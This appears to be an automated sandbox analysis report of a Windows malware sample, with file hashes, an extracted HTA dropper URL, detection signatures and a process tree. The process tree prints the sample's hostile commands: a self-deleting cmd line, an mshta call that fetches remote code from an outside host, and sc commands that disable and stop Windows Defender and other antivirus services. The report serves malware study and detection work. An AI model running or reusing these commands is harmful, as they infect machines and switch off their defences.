Overview

overview

10

Static

static

3

0faa869e08...64.exe

windows7-x64

10

0faa869e08...64.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    1s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24/12/2023, 20:04

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    0faa869e08d068297edd23ef8ac75f64.exe

  • Size

    2.2MB

  • MD5

    0faa869e08d068297edd23ef8ac75f64

  • SHA1

    016b7a80418b57367e1d729ffaaf749394dda44e

  • SHA256

    479d778eef8466818b7ad533ec36ec160796398a22fab717b162e7fd149f1b63

  • SHA512

    32f62ad6ac667eff2babf02f97f2f15ec8276e7acd304158c1ebf9fba9fe98fdfc92cf5e4cacb3e4a038c13d2bb18285b5a62aa6499297f9d74615adf8075378

  • SSDEEP

    24576:Xb5uYoANOFkQdELilVmyUkc35/lcPheUdzoYTjPZTGIAiiXRuUNK4dcoQL4:XbYYLNcgbkoWvdcYqiouUNMoO4

Score
10/10
evasionupx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.statson-linesec.info/?0=187&1=0&2=1&3=81&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=vvvileubdb&14=1

Signatures

  • Stops running service(s) 3 TTPs
    evasion
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0faa869e08d068297edd23ef8ac75f64.exe
    "C:\Users\Admin\AppData\Local\Temp\0faa869e08d068297edd23ef8ac75f64.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\0FAA86~1.EXE" >> NUL
      2⤵
      • Deletes itself
      PID:2192
    • C:\Users\Admin\AppData\Roaming\Protector-caay.exe
      C:\Users\Admin\AppData\Roaming\Protector-caay.exe
      2⤵
      • Executes dropped EXE
      PID:2000
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://galaint.statson-linesec.info/?0=187&1=0&2=1&3=81&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=vvvileubdb&14=1"
        3⤵
          PID:2052
        • C:\Windows\SysWOW64\sc.exe
          sc config GuardX start= disabled
          3⤵
          • Launches sc.exe
          PID:1556
        • C:\Windows\SysWOW64\sc.exe
          sc stop GuardX
          3⤵
          • Launches sc.exe
          PID:1196
        • C:\Windows\SysWOW64\sc.exe
          sc config AntiVirSchedulerService start= disabled
          3⤵
          • Launches sc.exe
          PID:1876
        • C:\Windows\SysWOW64\sc.exe
          sc config AntiVirService start= disabled
          3⤵
          • Launches sc.exe
          PID:1652
        • C:\Windows\SysWOW64\sc.exe
          sc stop AntiVirService
          3⤵
          • Launches sc.exe
          PID:1540
        • C:\Windows\SysWOW64\sc.exe
          sc config ekrn start= disabled
          3⤵
          • Launches sc.exe
          PID:1544
        • C:\Windows\SysWOW64\sc.exe
          sc config msmpsvc start= disabled
          3⤵
          • Launches sc.exe
          PID:2820
        • C:\Windows\SysWOW64\sc.exe
          sc stop msmpsvc
          3⤵
          • Launches sc.exe
          PID:1804
        • C:\Windows\SysWOW64\sc.exe
          sc config WinDefend start= disabled
          3⤵
          • Launches sc.exe
          PID:3052
        • C:\Windows\SysWOW64\sc.exe
          sc stop WinDefend
          3⤵
          • Launches sc.exe
          PID:2252

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Protector-caay.exe
            Filesize

            258KB

            MD5

            0c00ab2854496ac8d0cb3e69c254badc

            SHA1

            8a6910ccc6979f8be8dea19b50fac7060b4fc412

            SHA256

            17ea7107d227956964fe4ef5ca0c03293acca7c3d46356342804afa68d9ce3a9

            SHA512

            034e065c33b78dbb7b87b54039c29f9d62916b1abe5cf6c0501d1f7c68549021476923f748a56d2fcec00ab1ed89e046378a7970fc8465315c2934e4027c850c

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Protector-caay.exe
            Filesize

            170KB

            MD5

            bdf781ce475dd0f2420a4c9dea7161a3

            SHA1

            b25fe882fb1591fc9405b89dbb05a581cf7a412a

            SHA256

            0e66b7329c9e1a7fd77751bfe259ac0c9b2fb33769ce3f0d6fde0d4e7dfbe8aa

            SHA512

            22242f6681d00636f141ce2577ba624b16aac5959916336ff17bbf27346c603c894110c1d0e95f23abe1ea4c6f2afd7b12dc939051c8f9cc68795655c1948ebe

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Protector-caay.exe
            Filesize

            64KB

            MD5

            f8d6969efd585a3e1fb4a94b9b14adad

            SHA1

            04867ebbd54c2746a083007dd1f7f6b59a9a94d7

            SHA256

            91290362e59bce8d0246044e898bce36b24d06ad01b75ef16d0bebea32c0b0ef

            SHA512

            2070a19b5240d0a8a057bebba1c13d0022a3d62c83a7fd8f4bbda144a135e11f79a2d4216a9fe1d1d037a1118aa2c610d37ce9f8358b6895794be78275151ef7

            Download Submit

          • \Users\Admin\AppData\Roaming\Protector-caay.exe
            Filesize

            173KB

            MD5

            2a044e2a3a6719259f66840372d9db73

            SHA1

            fc2e31e762f9d65905f1e33d4228f0503043bb99

            SHA256

            3a59d2071f972a6604d6d86ed3bac45aa8b41044e6b2e7beed2c09b79151b488

            SHA512

            d24e88ae05cdc2ba4056a04227b2644738df32d79bb56a2fdf84bfc70fd0535077e671c50b2274d86b120d62d9226f6ff15ad80206174e6f9fcf8038d6fba511

            Download Submit

          • \Users\Admin\AppData\Roaming\Protector-caay.exe
            Filesize

            197KB

            MD5

            3c70491c583e47fb5a9eeee3933927b6

            SHA1

            6973034b9b8a2fc73e3dfc7f18f28b1f4db8c157

            SHA256

            8edc46ee6e42439495f82b0c7d33bc6358a77c08233033cd474d82281ef8a30a

            SHA512

            47ff598b3b7115cb8f95cbd10b2fcce1a5fd38257d7796c0f8edbef3f8a2a0690b2af9af8e7958f10bfff31fda767d05dfec84796cf95e92b95fa7623319279d

            Download Submit

          • memory/1716-1-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/1716-0-0x0000000000400000-0x0000000000982000-memory.dmp

            Filesize

            5.5MB

            Download

          • memory/1716-16-0x0000000076BB0000-0x0000000076CC0000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/1716-14-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/1716-15-0x0000000074CC0000-0x0000000074D39000-memory.dmp

            Filesize

            484KB

            Download

          • memory/1716-4-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/1716-5-0x00000000001B0000-0x00000000001B1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1716-3-0x0000000074CC0000-0x0000000074D39000-memory.dmp

            Filesize

            484KB

            Download

          • memory/1716-2-0x0000000076BB0000-0x0000000076CC0000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/2000-21-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2000-41-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2000-17-0x0000000000400000-0x0000000000982000-memory.dmp

            Filesize

            5.5MB

            Download

          • memory/2000-20-0x0000000074E70000-0x0000000074EE9000-memory.dmp

            Filesize

            484KB

            Download

          • memory/2000-19-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2000-25-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2000-23-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2000-22-0x0000000000260000-0x0000000000261000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2000-42-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2000-43-0x00000000056E0000-0x000000000619A000-memory.dmp

            Filesize

            10.7MB

            Download

          • memory/2000-44-0x00000000064F0000-0x0000000007552000-memory.dmp

            Filesize

            16.4MB

            Download

          • memory/2000-46-0x0000000000400000-0x0000000000982000-memory.dmp

            Filesize

            5.5MB

            Download

          • memory/2000-47-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2000-48-0x0000000000260000-0x0000000000261000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2000-50-0x0000000000400000-0x0000000000745000-memory.dmp

            Filesize

            3.3MB

            Download